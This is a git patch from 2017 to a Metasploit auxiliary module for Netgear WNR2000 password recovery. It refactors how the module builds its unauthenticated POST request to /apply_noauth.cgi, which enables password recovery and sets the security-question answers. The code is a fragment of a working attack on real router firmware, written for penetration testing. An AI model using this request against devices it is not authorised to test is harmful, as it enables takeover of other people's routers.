From bee36ca90f60745959b01bfbfc490c29bb3e7d34 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Thu, 11 May 2017 16:22:21 -0500
Subject: [PATCH] Fix edge case

---
 .../admin/http/netgear_wnr2000_pass_recovery.rb          | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb b/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb
index 49cd84fa20..1ea93dfcde 100644
--- a/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb
+++ b/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb
@@ -178,11 +178,12 @@ class MetasploitModule < Msf::Auxiliary
 
   def send_req(timestamp)
     begin
-      uri_str = (timestamp == nil ? \
-        "/apply_noauth.cgi?/PWD_password.htm" : \
-        "/apply_noauth.cgi?/PWD_password.htm%20timestamp=#{timestamp.to_s}")
+      query_str = (timestamp == nil ? \
+        '/PWD_password.htm' : \
+        "/PWD_password.htm%20timestamp=#{timestamp.to_s}")
       res = send_request_raw({
-          'uri'     => uri_str,
+          'uri'     => '/apply_noauth.cgi',
+          'query'   => query_str,
           'method'  => 'POST',
           'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
           'data'    => "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=#{@q1}&question2=2&answer2=#{@q2}"